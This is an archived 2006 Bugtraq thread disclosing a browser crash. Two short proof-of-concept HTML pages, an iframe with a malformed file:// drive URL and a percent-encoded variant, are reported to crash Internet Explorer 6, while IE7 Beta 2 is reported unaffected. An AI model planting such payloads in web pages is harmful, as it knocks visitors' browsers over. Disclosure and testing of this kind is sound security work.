lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Mon, 12 Jun 2006 13:40:49 -0800
From: Charles Hamby <fixer@....net>
To: "Greg Merideth (Forward Technology)" <gmerideth@...wardtechnology.net>
Cc: Mr.Niega@...il.com, bugtraq@...urityfocus.com
Subject: Re: RE: Internet Explorer vulnerbility


If you change:

<HTLM><BODY><IFRAME src="File://þ:/"></BODY></HTML>

to:

<HTLM><BODY><IFRAME src="File://%f%f%f%f:/"></BODY></HTML>

it will also crash IE 6.x.  Don't know about 7 Beta.  

-cdh

----- Original Message -----
From: "Greg Merideth (Forward Technology)" <gmerideth@...wardtechnology.net>
Date: Monday, June 12, 2006 1:18 pm
Subject: RE: Internet Explorer vulnerbility
To: Mr.Niega@...il.com, bugtraq@...urityfocus.com

> IE7 Beta 2 build [7.0.5346.5] parses without crashing.
> 
> Greg Merideth
> Forward Technology, LLC.
> CTO & Other Wild Stuff
> gmerideth@...wardtechnology.net
> PGP Fingerprint
> 18C3CE191171736225D62C3829F7B18A00F2AC0C
> 
> -----Original Message-----
> From: Mr.Niega@...il.com [mailto:Mr.Niega@...il.com] 
> Sent: Thursday, June 08, 2006 3:01 PM
> To: bugtraq@...urityfocus.com
> Subject: Internet Explorer vulnerbility
> 
> /*
> *
> * Internet Explorer Crash [Proof of concept]
> * Bug discovered by MarjinZ & Mr.Niega
> * http://www.swerat.com/
> *
> * Affected Software: Internet explorer
> * Severity: Unknown
> * Impact: Crash
> * Solution Status: Unpatched
> *
> * E-Mail: Mr.Niega@...il.com & MarjinZ@...il.com
> * __  __       __  __ 
> *|  \/  | __ _|  \/  |
> *| |\/| |/ _` | |\/| |
> *| |  | | | | | |  | |
> *|_|  |_|_| |_|_|  |_|
> * Credits goes out to GärBiz a.k.a *Gabriel,Garbiz,Gabbelito,Gärbpiz
> * K@2@nj@n §w€nn§0n
> *
> */
> <HTLM><BODY><IFRAME src="File://þ:/"></BODY></HTML>
> 
> 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ